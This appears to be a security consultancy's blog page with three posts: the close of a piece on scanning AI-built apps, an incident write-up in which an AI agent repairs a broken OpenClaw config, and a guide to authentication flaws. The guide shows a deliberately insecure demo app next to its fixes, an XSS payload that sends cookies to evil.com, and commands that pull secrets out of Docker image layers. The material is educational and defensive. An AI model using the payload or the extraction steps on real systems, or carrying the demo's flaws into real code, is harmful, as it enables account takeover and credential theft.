This is the emerging layer that didn’t exist a year ago. If you have access to Claude Code Security, Codex Security, or DryRun, run them as a complement to traditional SAST. They cover the architectural reasoning gap — detecting absent controls, evaluating whether authorization logic is semantically correct, and understanding data flow across service boundaries.

If you don’t have access to these commercial tools, you can approximate the approach by running an LLM against your SAST output to filter false positives (the technique from the January 2026 study reduced false positives from 98.3% to 6.3%), or by prompting an LLM to review specific security-critical files with targeted questions: “Does this endpoint verify that the authenticated user owns the requested resource?” “Is there a rate-limiting middleware applied to this route?”

Layer 5: Manual Review (The Irreplaceable Layer)

I’ve been in application security for over two decades. Every engagement I do at VULNEX starts with automated scanning and ends with manual review, because the automated tools always miss something. For vibe-coded apps, the manual review is even more important because the vulnerability classes are architectural.

The manual review checklist is shorter than people think. For each API endpoint: does it check authentication? Does it check authorization — not just “is this user logged in” but “is this user allowed to access this specific resource”? Is the client sending any data that controls server-side behavior (user IDs, role flags, price overrides) without server-side validation? Are there admin functions accessible to regular users?

A focused manual review of the auth and authorization layer takes hours, not days, and it catches the issues that every automated tool misses.

What This Costs

For a solo founder or small team, here’s roughly what this takes. Layers 1–3 use free, open-source tools — Gitleaks, Semgrep, npm audit, Socket.dev’s free tier, Nuclei. Setting up the full CI pipeline takes an afternoon if you’re comfortable with GitHub Actions or similar, a weekend if you’re starting from scratch. Layer 4 varies: Claude Code Security is free for open-source projects, DryRun and Escape have commercial pricing that typically starts in the low hundreds per month. Layer 5 is where it gets expensive if you don’t have security expertise in-house. A focused auth and authorization review from a security consultancy typically runs €3,000–€10,000 depending on application size and complexity. That’s real money for an early-stage startup — but skipping it is how the breaches from Part 3 happened.


The Scanning Checklist

Run this against your vibe-coded application. Each item addresses a specific gap in traditional scanning.

Secrets (Pre-Commit):

  1. Run gitleaks detect --source . --verbose and trufflehog filesystem . --only-verified — zero findings before any commit
  2. Search frontend bundles for leaked keys: grep -r "sk-\|API_KEY\|SECRET\|Bearer\|supabase\|firebase" dist/ build/
  3. Verify .env files were never committed: git log --all --diff-filter=A -- '*.env' '.env*'

SAST (CI Pipeline):

  1. Run semgrep --config=p/security-audit --error ./src — use the focused ruleset, not --config=auto, to keep noise manageable
  2. Review every high or critical finding manually — look for innerHTML, eval(), dangerouslySetInnerHTML, unsanitized SQL

SCA (CI Pipeline):

  1. Run npm audit --audit-level=high — address all high and critical CVEs
  2. Verify dependencies are real: check that every package in package.json has a legitimate npmjs.com page with downloads and a real maintainer
  3. Run Socket.dev or Snyk for behavioral analysis — catches supply chain attacks that CVE databases miss

DAST (Post-Deploy):

  1. Run nuclei -u https://yourapp.com -severity critical,high against your deployed app
  2. Check security headers and CORS: curl -s -D- https://yourapp.com | grep -i "x-frame\|x-content-type\|strict-transport\|content-security-policy" and test with Origin: https://evil.com

Manual (The Gaps):

  1. Test every API endpoint without the frontend — does it require authentication?
  2. Test cross-user access — can User A access User B’s resources by changing IDs?
  3. Test admin endpoints with a regular user’s token, send 100 rapid login requests to verify rate limiting (expect a 429), and confirm Supabase RLS / Firebase security rules are enabled and scoped to the authenticated user

This pipeline won’t catch everything. But it covers the layers where automated tools are reliable, flags the areas where they’re blind, and directs manual effort to where it matters most. If you’re running zero scanning today (which, based on what I see in assessments, describes most vibe-coded applications), starting with the first two Secrets items and the first two Manual items gives you the most security value for the least effort.


What You Should Take From This

Traditional security scanners aren’t broken. They’re solving a different problem. They were built for a world where developers understand their code and make localized mistakes — a forgotten parameterized query, a misused crypto function, an outdated dependency. AI-generated code introduces a new class of vulnerability: architecturally correct code with absent security controls. The login works, the JWT validates, the database responds — and the fact that any authenticated user can read any other user’s data isn’t something a pattern-matcher can flag.

The scanning landscape is evolving fast. AI-native tools that reason about code rather than pattern-matching against it are starting to close the gap. The IRIS approach (neuro-symbolic analysis), LLM-based false-positive filtering, and pre-publish gates like VibeGuard are all steps in the right direction. But as of mid-2026, no automated tool reliably catches broken authorization logic, missing rate limiting, or client-side-only security controls. Those still require human review.

My workflow at VULNEX: Gitleaks and TruffleHog for secrets, Semgrep for pattern-based issues, npm audit plus Socket.dev for dependencies, Nuclei for the deployed surface, and then manual testing of every auth and authorization boundary. The automated layers take minutes, the manual review takes hours — and in my experience, the manual review is where the critical vulnerabilities surface.

If you’re a solo founder or non-security engineer — which describes most people building with AI coding tools — Layer 5 is the hard one. You can’t review what you don’t know how to find. My practical advice: run Layers 1–3 at minimum, they’re free and they catch real issues. If your application handles user data, payments, or anything sensitive, budget for a professional security review before you launch. It doesn’t have to be a full pentest — a focused review of your auth and authorization boundaries, scoped to 2–3 days, catches the architectural issues that automation misses. Part 8 of this series will go deeper on this with a complete founder’s checklist.

As always: trust nothing, verify everything.



When Agents Fix Agents: How Hermes Patched OpenClaw After a Bad Update

Read Time: 7 minutes

TL;DR

I told OpenClaw to update itself. It did. Then the gateway refused to start because a config field had quietly changed shape between releases (channels.discord.streaming went from string to object). openclaw doctor --fix saw the problem but couldn’t fix it. The Google AI Overview confidently suggested the opposite of the correct fix. Hermes-Agent, with shell and filesystem access, read the failing config, made the right one-line change, backed up the original, restarted the service, and verified — all from a one-paragraph prompt. Thirteen minutes from red banner to green. This is what “agentic ops” actually looks like.


I have been running OpenClaw on a Raspberry Pi 5 for a while now. It is the kind of setup you tune on weekends and forget about during the week — until an update lands and something quietly breaks.

This morning was one of those mornings. What I want to write down is not just the bug, but the shape of the fix. OpenClaw’s own repair tool did not get the gateway back up. Neither did the AI Overview at the top of every Google result. What worked was a general-purpose agent with shell and file access, and the habit of reading a config before having an opinion about it.

That distinction sounds small. It is not.


Step 1: I Asked AgentX to Update Itself

The whole story starts with a perfectly reasonable instruction. I opened the OpenClaw chat UI, said hi to AgentX (my main OpenClaw agent), and asked it to update.

“update yourself please.” The kind of thing you say to an autonomous agent and assume it will handle.

It did handle the update part. It just did not handle the post-update validation part, because that is not yet a thing OpenClaw does by itself. The new release introduced a schema change to one of the config fields. The update wrote the new binaries. The config file kept its old shape. The next gateway start would fail.

I did not know any of this yet.


Step 2: Half an Hour Later, the Gateway Refuses to Start

Same session, same morning. The update completed quietly in the background. When I went to bring the gateway up — openclaw gateway, expecting a normal boot — I got this instead:

Invalid config at /home/vulnex/.openclaw/openclaw.json:
channels.discord.streaming: invalid config: must be object
Run "openclaw doctor --fix" to repair, then retry.

Helpful, in theory. The startup writes a stability bundle (good — that is what stability bundles are for) and the service dies on its way back down.


Step 3: Status Check Confirms the Broken State

I ran openclaw gateway status to get the full picture.

Red line across the board. state failed, sub failed, last exit 1, reason 1. The dashboard URL was sitting there mocking me, the loopback probe couldn’t connect, and the gateway was clearly not coming back without intervention.

This is the moment where, in a normal world, you would walk through OpenClaw’s suggested fix and be done in five minutes. So that is what I tried first.


Step 4: doctor --fix — The Self-Repair That Wasn’t (Part 1)

openclaw doctor --fix is meant to be the “have you tried turning it off and on again” button. So I tried it.

The doctor was happy to lecture me about NODE_COMPILE_CACHE and OPENCLAW_NO_RESPAWN on low-power hosts. Useful tips. Not the problem.


Step 5: doctor --fix — The Self-Repair That Wasn’t (Part 2)

The doctor walked through the config and gateway sections and ended where I started:

Restarted systemd service: openclaw-gateway.service
Error: Config validation failed: channels.discord.streaming: invalid config: must be object

The doctor restarted the service but never actually touched the offending key. Which makes sense, in hindsight. The validator says “must be object,” but the doctor has no opinion on what that object should look like. It is not in the business of guessing new schemas. Fair enough. Not very useful at 10:27 in the morning.

One thing OpenClaw should change: doctor --fix should not print “Restarted systemd service” one line above “Error: Config validation failed” and exit happy. It tripped me up, and it will trip other people up. I will file the bug.


Step 6: The Wrong Answer From the AI Overview

At this point I did what most people would do: I pasted the exact error string into Google to see if anyone else had hit this between versions.

It told me the validator wants a string like "partial", and that my config has an object — when in reality the new OpenClaw expects an object and my old config has a string. It even produced a tidy, syntax-highlighted JSON block I could have copy-pasted straight into the config to break it harder, and tagged the answer with a confidence-inspiring GitHub citation pill.

If I had been in a hurry, I would have pasted it. That is the part most “AI for ops” demos quietly skip. The answer was fluent, well-formatted, even cited — and 180° wrong about the direction the schema had migrated.

It is the same threat model I covered in Professional Vibe Coding vs. Vibe Coding, just dropped into an ops context instead of a coding one. If your AI cannot read the validator and the config, you are going to get a confident answer that was synthesised from the error string, and sometimes that answer is the opposite of correct.


Step 7: Calling In Hermes

I keep Hermes-Agent attached to this box for exactly this kind of mess. It has filesystem tools, shell execution, and the patience to read things instead of guessing.

The skill set matters here: file:patch, read_file, search_files, write_file, code_execution, plus the openclaw-agent-integrations skill I keep around for exactly this plumbing. Nothing glamorous, just the basic moves you need to repair a misconfigured service.

I gave it a one-paragraph brief:

“I told openclaw to update itself and did, however the latest version breaks due a openclaw config json file error. The folder path is /home/vulnex/.openclaw. Make a copy of the config json file and fix the issue. You can use openclaw command to see the issue.”

That is it. No schema, no hints, no example of the new format.


Step 8: Hermes Orients Itself

Hermes did what I would have done if I had another hour.

  • Inspected the environment
  • Found a way to invoke openclaw (the binary is on my PATH, but Hermes’ non-interactive shell did not inherit it, so it fell back to npx --yes openclaw and flagged that in its summary)
  • Read the failing config
  • Pulled the stability bundle that the gateway had dropped on its way out the door

Not a single dramatic LLM call. A stack of small, verifiable steps — find, command -v, head, npm prefix -g, a one-shot python3 heredoc that searches $PATH for anything named claw. Boring on purpose.


Step 9: Hermes Diagnoses

Once it had the config and the failure bundle in context, Hermes compared them and figured out exactly what had changed between releases.

No guessing from the error string. Reading the source.


Step 10: The Fix Lands

Hermes had none of the trouble the AI Overview did, because Hermes was reading the actual files instead of inferring from prose.

The diff is the whole story:

// before — old shape, valid in 2026.5.18 and earlier
"channels": {
  "discord": {
    "streaming": "off"
  }
}

// after — new shape, required by 2026.5.19
"channels": {
  "discord": {
    "streaming": { "mode": "off" }
  }
}

OpenClaw 2026.5.19 promoted channels.discord.streaming from a string to a tagged object. The doctor saw it was wrong but had no opinion on the new shape. The Google AI Overview had an opinion and it was the opposite of correct. Hermes:

  1. Read the failing config and the gateway’s startup_failed.json stability bundle
  2. Made the smallest possible change
  3. Wrote ~/.openclaw/openclaw.json.agenth-bak-20260521-103255 next to the original
  4. Restarted the gateway service
  5. Verified that the JSON parses cleanly and the previous error is gone
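
The core of that change can be sketched in a few lines of Node.js. This is an illustration only, not Hermes’ actual code: the function name migrateDiscordStreaming is hypothetical, and the only schema knowledge it uses is the string-to-object change shown in the diff above. Mapping every old string value to "mode" is an assumption; only "off" is confirmed by this incident.

```javascript
// Hypothetical helper: upgrades channels.discord.streaming from the old
// string form ("off") to the new object form ({ mode: "off" }).
// Returns a new config object and leaves the input untouched.
function migrateDiscordStreaming(config) {
  const streaming = config?.channels?.discord?.streaming;
  if (typeof streaming !== 'string') {
    return config; // already an object (or absent): nothing to migrate
  }
  return {
    ...config,
    channels: {
      ...config.channels,
      discord: { ...config.channels.discord, streaming: { mode: streaming } },
    },
  };
}

const oldConfig = { channels: { discord: { streaming: 'off' } } };
const newConfig = migrateDiscordStreaming(oldConfig);
console.log(JSON.stringify(newConfig));
// {"channels":{"discord":{"streaming":{"mode":"off"}}}}
```

In a real repair the order matters as much as the transform: copy the original file first, write the migrated JSON, then re-parse it and restart the service.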

It also called out its own caveats honestly:

  • It used npx --yes openclaw because its non-interactive shell didn’t inherit my interactive PATH — even though the openclaw binary is, in fact, installed globally on this host. A small mis-read of the environment, but a transparent one.
  • openclaw doctor still reported unrelated warnings — but the config-breaking startup issue was fixed

That self-reporting matters, even when (as with the PATH case) the agent is slightly too pessimistic about its environment. An agent that flags its assumptions is much easier to trust than one that hides them.


Step 11: Verification From the Shell

Trust, but verify. Back to the original command that started this whole thing.

Runtime: running (pid 10178, state active, sub running, last exit 0, reason 0)
Connectivity probe: ok

Same command, opposite outcome. Eleven minutes earlier this had been a wall of red.


Step 12: Asking AgentX to Confirm

Then I went back to the OpenClaw chat UI — the same place where the whole story started — and asked AgentX directly. Because if you cannot trust the agent to self-report after a recovery, you have other problems.

“All good — gateway is running on 2026.5.19, active since 10:33. The doctor --fix restart attempt errored but the service came up fine on its own. We’re fully updated and online.”

Thirteen minutes from the first red banner to a green status. Most of that was me reading.

The chat session bookends the whole story. It opens with “update yourself please” and closes with “fully updated and online.” In between, a completely different agent had to come in and do the actual work. That gap is what this post is about.


What This Episode Actually Tells Us

The tidy version of the story is “agent breaks itself, agent fixes itself.” The interesting part is the middle.

The vendor’s own repair tool did not fix the vendor’s own product

openclaw doctor --fix is a good idea, poorly committed to. It should either understand the schema migration paths between recent releases, or stop pretending it has done a repair when the next line of its own output says the config still fails to validate. Right now it does the worst possible thing: it claims success and leaves you broken. That is an OpenClaw bug, not an AI bug, and I will file it.

Consumer AI Overviews are confidently wrong on schema questions

This is not a one-off. The AI Overview cannot read your config, cannot read the validator source, cannot tell which way a schema migrated between two versions, and formats the wrong answer with the same confidence as the right one.

For someone just trying to get the gateway back up before a meeting, that answer is worse than no answer at all. No answer sends you to the docs. A confident wrong answer sends you to paste broken JSON into a working file.

It is not a Google-specific problem either. It is the general pattern of producing a fluent answer from the symptom rather than the source. Any AI deployed without read access into the actual artifact will hit the same wall.

The agent that worked was not magic

Hermes did not solve this because it is bigger, smarter, or trained on something exotic. It solved it because it could read the file, run a command, write the file, and keep a backup. Those four moves are the floor for what I would call agentic ops, and most consumer AI is still well below the floor.

The rule I take away from the morning is short: if the AI you are about to trust with a config can’t read the file and can’t keep a backup, it is not an ops tool. It is a search engine with better grammar.


What I Would Change About My Setup After This

A few things I am going to wire up this weekend.

I want ~/.openclaw/openclaw.json snapshotted to a local git repo before every openclaw update. Hermes’ .agenth-bak files are fine for one incident, but a real version-controlled history is better when the next schema change lands.

I am also going to stop treating doctor --fix as a single-step recovery. It is a diagnostic that occasionally also writes a fix. The actual gate has to be re-running openclaw gateway status afterward and reading the output.
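
A rough sketch of what that gate could look like, assuming the status output keeps the two lines quoted earlier in this post ("Runtime: running ... last exit 0" and "Connectivity probe: ok"). The function name isGatewayHealthy is hypothetical, and other OpenClaw releases may print something different, so treat the patterns as placeholders.

```javascript
// Hypothetical gate: decides whether the gateway is healthy from the text
// printed by `openclaw gateway status`. The two patterns are based only on
// the lines quoted in this post.
function isGatewayHealthy(statusText) {
  const running = /^Runtime:\s*running\b.*\blast exit 0\b/m.test(statusText);
  const probeOk = /^Connectivity probe:\s*ok\b/m.test(statusText);
  return running && probeOk;
}

const healthyOutput = [
  'Runtime: running (pid 10178, state active, sub running, last exit 0, reason 0)',
  'Connectivity probe: ok',
].join('\n');

// Made-up failing output for the example; the real failure text may differ.
const failedOutput = 'Runtime: stopped (state failed, sub failed, last exit 1, reason 1)';

console.log(isGatewayHealthy(healthyOutput)); // true
console.log(isGatewayHealthy(failedOutput));  // false
```

The point of the design is that the recovery is only considered done when both checks pass, regardless of what doctor --fix printed.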

Hermes stays attached to this box with file and exec scopes pre-approved. The whole point of the setup is that when things break at 10:25, I am not also wiring up tool permissions at 10:26.

And the backup naming needs work. openclaw.json.agenth-bak-20260521-103255 is sensible, but I want those files dropping into ~/.openclaw/backups/ rather than sitting next to the live config.
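
One possible naming scheme, sketched under assumptions: the helper name backupPathFor and the ".bak-" suffix are made up for this example, and the timestamp uses local time in the same YYYYMMDD-HHMMSS shape as the Hermes backup.

```javascript
const path = require('node:path');

// Hypothetical helper: builds a timestamped backup path inside a backups/
// directory that sits next to the config file. POSIX paths are assumed.
function backupPathFor(configPath, now = new Date()) {
  const pad = (n) => String(n).padStart(2, '0');
  const stamp =
    `${now.getFullYear()}${pad(now.getMonth() + 1)}${pad(now.getDate())}` +
    `-${pad(now.getHours())}${pad(now.getMinutes())}${pad(now.getSeconds())}`;
  const dir = path.posix.join(path.posix.dirname(configPath), 'backups');
  return path.posix.join(dir, `${path.posix.basename(configPath)}.bak-${stamp}`);
}

const exampleBackup = backupPathFor(
  '/home/vulnex/.openclaw/openclaw.json',
  new Date(2026, 4, 21, 10, 32, 55), // local time: 2026-05-21 10:32:55
);
console.log(exampleBackup);
// /home/vulnex/.openclaw/backups/openclaw.json.bak-20260521-103255
```

The actual copy is then two standard calls: fs.mkdirSync(dir, { recursive: true }) followed by fs.copyFileSync(source, destination).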

If you are running OpenClaw yourself, the Security Hardening Guide I wrote earlier this spring is still the right baseline. Nothing in this morning’s incident changed those recommendations. It just reinforced why a read-only AI that cannot touch the artifact does not belong anywhere near your recovery loop.


Setup Notes

For anyone reproducing or comparing:

  • OpenClaw 2026.5.19 on a Raspberry Pi 5 running Linux
  • Gateway on port 18789, controlled from the OpenClaw web UI
  • Hermes-Agent v0.12.0 on the gpt-5.5 backend with 272K context, configured against my standard skill stack
  • Original ~/.openclaw/openclaw.json preserved as openclaw.json.agenth-bak-20260521-103255 for forensic comparison

One line of JSON, and a reminder that the AI you trust in an incident has to be allowed to read the file.

Stay paranoid. Read the source. Keep the backup.

Need help hardening your AI agent deployment? VULNEX offers:

  • AI agent security assessments (skill auditing, prompt injection testing, configuration reviews)
  • Red team engagements (AI-powered attack simulations)
  • Security automation and agentic-ops consulting
  • Custom security tool development

Contact: info@vulnex.com


Authentication & Secrets: What AI Gets Wrong Every Time (Part 5)

Vibe Coding Security Series

  1. What Is Vibe Coding Security? A Field Guide for 2026
  2. The OWASP Top 10 for Vibe-Coded Applications
  3. Anatomy of a Vibe Coding Breach: Lessons from 2026’s Worst Incidents
  4. The Dependency Trap: Supply Chain Risks in AI-Generated Code
  5. Authentication & Secrets: What AI Gets Wrong Every Time (you are here)
  6. Scanning Vibe-Coded Apps: Why Traditional SAST/DAST Falls Short (https://simonroses.com/2026/05/scanning-vibe-coded-apps-why-traditional-sast-dast-falls-short-part-6/)
  7. Prompt Engineering for Secure Code
  8. The Founder’s Security Checklist (coming soon)
  9. Securing the AI Coding Pipeline (coming soon)
  10. The Future of Vibe Coding Security (coming soon)

Read Time: 22 minutes

TL;DR

Authentication and secrets management is where AI-generated code fails most consistently and most dangerously. In 67 lines of a demo app I built for a security conference, the AI produced hardcoded JWT secrets, MD5 password hashing, tokens that never expire, XSS vulnerabilities, and zero rate limiting — all in a working application that looks completely normal to a non-security person. GitGuardian found 29 million hardcoded secrets on GitHub in 2025, a 34% year-over-year jump, with AI-assisted commits leaking secrets at more than double the rate of human-written code. Inigra’s Q1 2026 audit of over 200 vibe-coded applications found that 91.5% contained at least one security vulnerability traceable to AI-generated code. And when Lovable — one of the biggest vibe coding platforms — got hit with a BOLA vulnerability in April 2026, five API calls from a free account were enough to access any other user’s source code, database credentials, and customer data. This post dissects the four patterns that AI gets wrong every single time — hardcoded secrets, client-side auth, broken JWT handling, and missing access controls — and ends with a 20-item checklist you can run against your app right now.


Why Auth Is Where It Breaks

You can ship a vibe-coded app with a CSS bug and nobody gets hurt. Ship it with a broken authentication flow, and everything behind the login is exposed. Auth isn’t just another feature — it’s the boundary between “my data” and “everyone’s data.” And it’s the thing AI coding tools handle worst.

It comes down to training data. AI models learned to code from public repositories, Stack Overflow answers, and tutorials. Those examples simplify authentication for clarity: hardcoded secrets so the reader can focus on the JWT logic, MD5 hashing because the tutorial isn’t about password security, no token expiration because it’s a demo. When a vibe coder prompts “add user authentication to my app,” the AI reproduces these patterns — not because it’s stupid, but because that’s what most of its training examples look like.

The code works. The login form appears. The JWT authenticates. The protected routes reject unauthenticated users. Every functional test passes. And any attacker with browser DevTools can walk right through it.

At VULNEX, authentication is the first thing we check in every assessment. In vibe-coded applications, it’s where we find the most critical issues — and it’s where five minutes of review would have prevented the most damage.


QuickNote: 67 Lines of AI-Generated Insecurity

To show this at a security conference, I built a demo. I prompted an AI coding tool to create a note-taking app — user registration, login, CRUD operations. Simple full-stack app, Node.js and Express. The prompt ended with something every vibe coder has thought at some point: “Skip security best practices for now — I’ll review them later.”

The AI generated 67 lines of backend code and 49 lines of frontend. A working app. Clean structure. You could demo it and it would look professional. What follows is what it actually produced — and every vulnerability here is something I find in real production vibe-coded applications.

The Hardcoded Secret

const SECRET = "insecure_secret_key";

Line 19. The JWT signing secret — the single piece of data that prevents anyone from forging authentication tokens — is a hardcoded string sitting in the source code. Not an environment variable. Not a secrets manager. A string literal, visible in the source, that would survive into version control, Docker images, and deployment bundles.

If you know this string, you can generate valid JWT tokens for any user. Full account takeover, no password required.

The fix:

const SECRET = process.env.JWT_SECRET; // loaded from environment, never in source

One line. That’s the difference between “anyone can forge tokens” and “tokens are cryptographically secure.” The value comes from a .env file (which is in .gitignore) or a secrets manager in production.
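
One caveat worth a sketch: if JWT_SECRET is not set, process.env.JWT_SECRET is simply undefined, and a short value is barely better than a hardcoded one. The helper below is a hypothetical startup check, not part of the demo app, and the 32-character minimum is an assumption chosen for illustration.

```javascript
const crypto = require('node:crypto');

// Hypothetical startup check: refuse to boot with a missing or short secret.
// The 32-character minimum is an assumption for this sketch, not a standard.
function loadJwtSecret(env = process.env) {
  const secret = env.JWT_SECRET;
  if (typeof secret !== 'string' || secret.length < 32) {
    throw new Error('JWT_SECRET must be set to a random value of at least 32 characters');
  }
  return secret;
}

// One way to generate a suitable value (run once, store it outside the repo).
const generatedSecret = crypto.randomBytes(32).toString('hex'); // 64 hex characters
console.log(loadJwtSecret({ JWT_SECRET: generatedSecret }).length); // 64
```

Failing at startup is the deliberate design choice here: a missing secret becomes a deployment error instead of a silent weakness discovered at the first login.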

The Broken Hash

function hashPassword(password) {
  return crypto.createHash('md5').update(password).digest('hex');
}

MD5. No salt. Every instance of the password “admin123” produces the same hash across every user, every time. Rainbow table attacks crack these in seconds. MD5 has been considered broken for password hashing since the mid-2000s. But it shows up in AI-generated code constantly, because it’s simple and it appeared in thousands of tutorials the model trained on.

The AI picked the approach from the tutorial, not the approach from production.

The fix:

const bcrypt = require('bcrypt');
async function hashPassword(password) {
  return bcrypt.hash(password, 12); // per-user salt, 12 rounds
}

bcrypt generates a unique salt per password automatically and is deliberately slow; that slowness is the point. How slow? MD5 hashes a password in roughly one microsecond (0.000001 seconds) in Node.js. bcrypt at a cost factor of 12 takes about 0.3 seconds. That’s a 300,000x difference. Take a password database of 10,000 users hashed with MD5. There is no salt, so you only need to hash each candidate password once, and the entire rockyou.txt wordlist (14.3 million entries) can be tested against every user in under a minute. The same database with bcrypt? Each user has a unique salt, so you rehash all 14.3 million candidates per user: 10,000 × 14.3 million × 0.3 seconds is about 4.3 × 10^10 seconds of work. On a 10-core CPU, that’s roughly 136 years. GPU-based cracking rigs shorten this significantly, but even a high-end GPU cluster brings it down to years, not minutes. That’s the math behind “use bcrypt.”
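
The arithmetic is easy to reproduce. The inputs below are the rough figures quoted in the paragraph above, not measurements, so the output is an order-of-magnitude estimate.

```javascript
// Inputs are the estimates quoted in the text; they are not benchmarks.
const userCount = 10_000;
const candidates = 14_300_000; // rockyou.txt entries
const md5Seconds = 1e-6;       // about 1 microsecond per MD5 hash
const bcryptSeconds = 0.3;     // about 0.3 s per bcrypt hash at cost 12
const cores = 10;
const secondsPerYear = 365.25 * 24 * 3600;

// Unsalted MD5: hash each candidate once, then compare against all users.
const md5Total = candidates * md5Seconds;

// bcrypt: the per-user salt forces a full pass over the wordlist per user.
const bcryptYears = (userCount * candidates * bcryptSeconds) / cores / secondsPerYear;

console.log(md5Total.toFixed(1), 'seconds');   // 14.3 seconds
console.log(Math.round(bcryptYears), 'years'); // 136 years
```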

The Immortal Token

const token = jwt.sign({ id: user.id, username: user.username }, SECRET);

No expiration. This JWT is valid forever. Once issued, it never needs to be refreshed. If it’s intercepted, stolen, or leaked, it provides permanent access to the account. No expiresIn parameter. No refresh token mechanism. No way to invalidate a compromised session.

The fix:

const token = jwt.sign(
  { id: user.id, username: user.username },
  process.env.JWT_SECRET,
  { expiresIn: '1h' }  // token dies in one hour
);

One option object. That’s what separates “permanent access if stolen” from “one-hour window.”

The XSS Injection Point

notes.innerHTML = data.map(n => `<li>${n.content}</li>`).join('');

On the frontend, note content is injected directly into the DOM via innerHTML with zero sanitization. Store <script>document.location='https://evil.com/steal?cookie='+document.cookie</script> as a note, and every time the page renders, the script executes. In a multi-user context, this is stored XSS — the most dangerous variant.

The fix:

notes.textContent = ''; // clear safely
data.forEach(n => {
  const li = document.createElement('li');
  li.textContent = n.content; // textContent escapes HTML automatically
  notes.appendChild(li);
});

textContent instead of innerHTML. The browser treats the content as text, not executable markup. No sanitization library needed.

What’s Missing

Beyond what’s in the code, look at what isn’t: no rate limiting on login, no HTTPS enforcement, no CORS configuration, no input validation on the registration endpoint, no password complexity requirements, no account lockout, no logging of auth events.

The rate limiting gap deserves numbers. Without it, an attacker can send login requests as fast as the server responds, easily 100+ per second against a typical Express app. The rockyou.txt wordlist contains 14.3 million passwords. At 100 requests/second, that’s about 40 hours to try every single one against one account. But most users pick common passwords: the top 1,000 most common passwords cover roughly 14% of all accounts. At 100 requests/second, those 1,000 attempts take ten seconds per account. Ten seconds for a one-in-seven chance of compromising any given account, because the AI didn’t add express-rate-limit, a five-line middleware.
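
To make the idea concrete, here is a dependency-free sketch of a fixed-window limiter. It is not express-rate-limit and not production code: state lives in memory, the function names are hypothetical, and the limits (5 attempts per window) are assumptions for the example.

```javascript
// Minimal fixed-window limiter, keyed by client (for example IP + username).
// Illustrative only: in-memory state, single process, no cleanup of old keys.
function createLoginLimiter({ maxAttempts = 5, windowMs = 15 * 60 * 1000 } = {}) {
  const attempts = new Map(); // key -> { count, windowStart }
  return function isAllowed(key, now = Date.now()) {
    const entry = attempts.get(key);
    if (!entry || now - entry.windowStart >= windowMs) {
      attempts.set(key, { count: 1, windowStart: now }); // start a new window
      return true;
    }
    entry.count += 1;
    return entry.count <= maxAttempts;
  };
}

const isAllowed = createLoginLimiter({ maxAttempts: 5, windowMs: 60_000 });
const results = [];
for (let i = 0; i < 7; i++) results.push(isAllowed('203.0.113.7', 1_000 + i));
console.log(results); // [ true, true, true, true, true, false, false ]
console.log(isAllowed('203.0.113.7', 1_000 + 60_000)); // true (new window)
```

With the default settings in this sketch (5 attempts per 15 minutes), the same 1,000-password run that took ten seconds would need 200 windows, or about 50 hours per account.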

Every one of these is a vulnerability. The AI produced all of them in 67 lines. And the app works — which is exactly why nobody catches them until it’s too late.


Pattern 1: Hardcoded Secrets — The Problem at Scale

QuickNote’s const SECRET = "insecure_secret_key" is one line in one demo. The problem is that this exact pattern repeats across millions of repositories.

The Numbers

GitGuardian’s State of Secrets Sprawl 2026 report found 29 million hardcoded secrets on GitHub in 2025 — a 34% year-over-year increase and the largest single-year jump they’ve ever recorded. AI-service credentials specifically surged 81%, with 1.27 million AI-related tokens exposed.

The vibe coding connection is direct: GitGuardian measured that Claude Code-assisted commits leaked secrets at 3.2% compared to 1.5% for the baseline across all public commits — more than double the rate. The AI doesn’t distinguish between “this is a value I should externalize” and “this is a value the code needs.” It puts the API key where the code works, which is inline.

Your .env Isn’t Safe Either

You’d think the fix is simple — put secrets in .env and keep them out of code. But Knostic’s research showed that tools like Cursor and Copilot actively read .env files during context building, effectively exposing secrets to the model’s cloud API. The secret you carefully put in an environment variable gets pulled into the AI’s context window, and can end up reproduced in generated code elsewhere.

So the AI reads your secrets from .env, and then hardcodes them into the next file it generates. The pattern feeds itself.

It gets worse at deployment. AI tools frequently generate Dockerfiles that copy the entire project directory into the image, including .env:

# COPY . copies everything in the build context, including .env
COPY . /app
RUN npm install

Even if you later delete .env inside the container, Docker images are layered. The file persists in the earlier layer. Anyone who pulls the image can extract it:

docker history --no-trunc <image>
mkdir -p /tmp/layers
docker save <image> | tar -xf - -C /tmp/layers
# grep through the extracted layers for secrets
grep -r "API_KEY\|SECRET\|DATABASE_URL" /tmp/layers/

The fix is a .dockerignore file that excludes .env, node_modules, and any other sensitive files — and passing secrets at runtime via Docker secrets or environment injection. But AI-generated Dockerfiles almost never include a .dockerignore. They optimize for “build succeeds,” not “build is secure.”

Real Consequences

In March 2026, a developer got an $82,314 bill after a Google API key embedded in their website’s frontend JavaScript was stolen. The key was originally created for Google Maps — low-risk, public by design. But when Google launched Gemini, existing Maps keys silently gained access to Gemini endpoints. Attackers found the exposed key, automated requests against Gemini Pro, and ran up $82K in 48 hours. The developer’s normal monthly spend was $180. This is the exact pattern vibe-coded apps reproduce at scale: API keys embedded in client-side JavaScript, visible to anyone who opens the page source.

And leaked secrets don’t get cleaned up. GitGuardian found that 64% of secrets detected in 2022 were still valid and unrevoked in 2026. When an AI puts a key in your frontend bundle and that bundle ships to a CDN, the key is public forever — unless you revoke and rotate, which most teams don’t.

What to Check

Run Gitleaks or TruffleHog against your codebase right now. Search for hardcoded strings that look like API keys, database connection strings, or JWT secrets. Check your frontend bundle — anything in client-side JavaScript is public. If you find secrets, revoke them immediately, rotate to new credentials, and move them to environment variables or a secrets manager.


Pattern 2: Client-Side Authentication — The Unlocked Door

The Pattern

This is the Enrichlead pattern from Part 3 at industrial scale. AI coding tools consistently place authentication and authorization checks in frontend code where they’re trivially bypassed. The paywall is a conditional render in React. The admin panel is hidden by a CSS class. The API endpoint exists and works — the frontend just doesn’t show the button to unauthenticated users.

The Data

Wiz’s research on vibe-coded applications identified four systemic misconfiguration patterns, and client-side authentication led the list. Their findings: AI tools generate auth logic that optimizes for the user experience — showing and hiding UI elements — without implementing corresponding server-side enforcement. The result is applications where every protected feature is one curl command away from being accessed by anyone.

Inigra’s Q1 2026 audit of over 200 vibe-coded applications found that 91.5% contained at least one security vulnerability traceable to AI-generated code, with over 60% exposing hardcoded credentials. The Lovable platform — one of the most popular vibe coding tools, valued at $6.6 billion with eight million users — was at the center of multiple security incidents in early 2026, with researchers finding that over 170 apps built on the platform had Supabase tables queryable by anyone holding the public anon key.

A significant portion of these involved Supabase misconfigurations. Here’s what typical AI-generated Supabase code looks like:

-- What the AI generates (WRONG):
CREATE TABLE notes (
  id SERIAL PRIMARY KEY,
  user_id UUID REFERENCES auth.users,
  content TEXT
);
-- No RLS policy. Any authenticated user can read/write all rows.
-- With the anon key, even unauthenticated users can access the table.

-- What it should generate:
